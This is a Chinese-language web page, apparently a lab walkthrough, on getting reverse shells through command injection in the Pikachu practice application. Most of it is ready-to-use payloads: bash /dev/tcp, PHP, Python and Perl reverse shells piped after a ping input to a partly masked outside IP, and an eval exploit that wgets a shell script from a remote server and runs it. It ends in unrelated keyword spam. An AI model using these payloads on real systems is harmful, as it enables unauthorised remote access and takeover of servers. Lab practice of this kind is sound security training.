千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 互联网科技 >

怎么反弹shell

发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,这篇文章主要讲解了"怎么反弹shell",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"怎么反弹shell"吧!题目分析:Pikachu的RCE处whoa
千家信息网最后更新 2025年12月02日怎么反弹shell

这篇文章主要讲解了"怎么反弹shell",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"怎么反弹shell"吧!

题目分析:
Pikachu的RCE处


whoami是www-data权限,很低的权限;

pwd可查看到当前路径且判定是linux系统;

ls -al查看了下当前目录下的读写执行权限:



可以看出其他用户是没有高权限的,写入执行权限都没有,就不能在当前目录下写马;经尝试,bash反弹shell未能成功。


第一题:exec "ping"


方法一: /tmp写入bash反弹脚本执行

/tmp下有可写可执行权限,那么写个bash反弹脚本上去:

127.0.0.1|Echo 'bash -i >& /dev/tcp/47.107.x.xx/7777 0>&1'>/tmp/cdk.sh


Vps上先监听,然后bash执行脚本:

127.0.0.1|bash /tmp/cdk.sh



方法二: php反弹shell

Payload:

127.0.0.1|php -r '$sock=fsockopen("47.107.xx.xxx",7777);exec("/bin/sh -i <&3 >&3 2>&3");'



方法三: python反弹shell

Payload:

127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.107.xx.xx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



方法四: perl反弹shell

Payload1(依赖/bin/sh):

127.0.0.1|perl -e 'use Socket;$i="47.107.xx.xx";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



Payload2(不依赖/bin/sh):

127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"47.107.xx.xx:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'



第二题:exec "eval"


题目如图:


自己服务器上写个反弹shell的sh,利用wget下载到目标服务器,避免传输过程发生格式问题。



利用python启用http服务。



执行命令:

system('wget -P /tmp/ http://180.76.xx.xx:8000/drinkwater.sh')



执行脚本,成功反弹shell:

system("bash /tmp/drinkwater.sh");


感谢各位的阅读,以上就是"怎么反弹shell"的内容了,经过本文的学习后,相信大家对怎么反弹shell这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是,小编将为大家推送更多相关知识点的文章,欢迎关注!

很赞哦!
权限 方法 脚本 学习 服务 成功 内容 服务器 目录 问题 题目 下有 命令 就是 思路 情况 文章 更多 有高 格式 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 软件开发建模教科书推荐 电信安全网络安全信息安全 怎么查看电脑右下角的数据库 ios好用的股票软件开发 阳江2011服务器散热器多少钱 软件开发所需资源 怎么给服务器加防火墙 数据库恢复会员账号 mqsql数据库行列转换 邯郸网络安全手册 软件开发黄金期 db2数据库界面 网络安全方面你有哪些收获 数据库设计 人员 圣多软件开发深圳有效公司 电商系统数据库一般有什么表 网络安全概念股有哪几只 手机远程数据库app 武林外传的服务器叫什么 个人怎样保护网络安全英语 联想服务器imm 软件开发在大学好就业吗 教师教育网络安全 星和网络技术 华为用到7纳米的服务器芯片 综合网络安全指数 js mysql数据库 广西中鑫软件开发吭人吗 app 服务器端安全架构 远程访问数据库opensource 资源

相关文章

0